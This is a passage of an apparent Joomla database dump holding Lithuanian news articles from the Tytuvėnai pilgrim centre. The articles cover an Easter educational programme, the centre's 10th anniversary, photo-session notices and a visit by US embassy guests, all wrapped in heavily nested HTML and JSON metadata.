Tytuvėnų piligrimų centras”, Tytuvėnų regioninio parko direkcija, Tytuvėnų gimnazija.</span></span></span></span></span></span></p>',1,0,0,44,'2018-03-15 20:18:42',135,'','2018-03-15 20:22:47',135,0,'0000-00-00 00:00:00','2018-03-15 20:18:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kovo11\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,77,'','',1,2469,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(308,397,'Šventinė-edukacinė programa','sventine-edukacine-programa','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinų vienuolyne šventinė-edukacinė programa<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">„Nuo Verbų sekmadienio iki vaikų Velykėlių.“</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/velykos2018/velykos.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Programa skirta vaikams ir suaugusiems.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Programos metu:</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Susipažinsite su senomis gavėnios - Velykų laiko tradicijomis liaudyje ir senajame bernardinų vienuolyne.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Vašku ir vaško kreidelėmis išmarginsite velykinį margutį;</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">-Žaisime, minsime mįsles.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Papildoma informacija:</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Jei pageidausite, už papildomą mokestį pavaišinsime Jus kvapia žolelių arbata iš senovinio virdulio ir „zuikio pyragėliu“.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Pageidaujama grupė ne mažesnė kaip 10 žmonių;</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Programos kaina vienam žmogui – 3,00E</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Programos kaina vienam žmogui su „zuikio pyragėliu“ ir arbata – 4,00E </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Grupių priėmimo laikas derinamas iš anksto.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Registracija tel.: 8-675-58506 arba</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">El. paštu: info@infotytuvenai.lt</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Maloniai laukiame Jūsų!</span></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2018-03-22 13:45:45',135,'','2018-03-22 13:51:13',135,0,'0000-00-00 00:00:00','2018-03-22 13:45:45','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/velykos2018\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,76,'','',1,2295,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(309,398,'Video apie Kelmės kraštą','video-apie-kelmes-krasta','','<p><iframe src=\"https://www.youtube.com/embed/s_S0kTebZ94\" frameborder=\"0\" width=\"854\" height=\"480\"></iframe> <br /> <iframe src=\"https://www.youtube.com/embed/ZWtuPF60NDw\" frameborder=\"0\" width=\"854\" height=\"480\"></iframe></p>','',1,0,0,52,'2018-03-22 20:28:17',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-03-22 20:28:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,1,'','',1,5745,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(313,402,'Jubiliejaus minėjimas','jubiliejaus-minejimas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Š.m. balandžio 6 d. VšĮ „Tytuvėnų piligrimų centras“ minėjo savo 10 metų jubiliejų. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=600}stories/naujienos/jubiliejaus_minejimas{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Centro direktorė Asta Vaitkevičiūtė-Kizienė renginio metu pristatė pagrindinius įstaigos tikslus, veiklą ir siekius, buvusius, esamus ir būsimus projektus, parodė koks Tytuvėnų bažnyčios ir vienuolyno ansamblis buvo iki restauracijos ir kaip atrodo šiandien. Įteiktos padėkos už paramą, dvasinį palaikymą, ilgametį darbą kartu, už centro veiklos palaikymą, už nestandartinių idėjų skatinimą ir generavimą bei geranoriškumą Šiaulių vyskupijos kurijos J. E. vyskupui Eugenijui Bartuliui, Kelmės r. savivaldybės merui Vaclovui Andruliui, Šiaulių vyskupijos kurijos Kancleriui kun. Evaldui Alūzai, Kelmės r. savivaldybės administracijos direktorei Irenai Sirusienei, Klebonui kun. Rimantui Žaromskiui, Tytuvėnų seniūnui Romui Čerkauskui, Zenonui Mačerniui. Svečius džiugino nuostabūs Šiaulių styginių kvarteto garsai.</span></span></span></span></span></span></p>',1,0,0,44,'2018-04-09 18:39:25',135,'','2018-04-09 18:39:31',135,0,'0000-00-00 00:00:00','2018-04-09 18:39:25','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/jubiliejaus_minejimas\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,72,'','',1,2209,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(310,399,'Fotografų dėmesiui','fotografu-demesiui','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Informuojame, fotosesijos Tytuvėnų bažnyčios ir vienuolyno ansamblyje bei teritorijoje yra mokamo.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p><img src=\"images/stories/naujienos/fotografams/fotografams.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2018-03-30 04:52:38',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-03-30 04:52:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/fotografams\\/fotografams_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,75,'','',1,2186,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(311,400,'Fotosesijos','fotosesijos','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame Tytuvėnų bažnyčios ir vienuolyno ansamblyje bei teritorijoje užsisakyti fotosesijas Jūsų įsimintinoms šventėms įamžinti...</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p><img src=\"images/stories/naujienos/fotosesijos/fotosesijos_visiems.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2018-03-30 04:59:41',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-03-30 04:59:41','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/fotosesijos\\/fotosesijos_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,74,'','',1,3220,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(312,401,'Gimtadienis','gimtadienis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ \"Tytuvėnų piligrimų centras\" švenčia savo 10 metų Jubiliejų!</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p><img src=\"images/stories/naujienos/gimtadienis/piligrimu_gimtadienis.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2018-03-30 05:08:25',135,'','2018-03-30 05:09:19',135,0,'0000-00-00 00:00:00','2018-03-30 05:08:25','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gimtadienis\\/gimtadienis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,73,'','',1,2457,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(314,403,'Svečiai iš JAV ambasados','sveciai-is-jav-ambasados','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bažnyčios ir vienuolyno ansamblyje lankėsi Scott Tolsma – JAV ambasados Vilniuje informacinių technologijų skyriaus vadovas ir Saulius Montvila – \"American spaces\" vadovas. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Džiaugiamės sulaukę garbingų svečių. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; 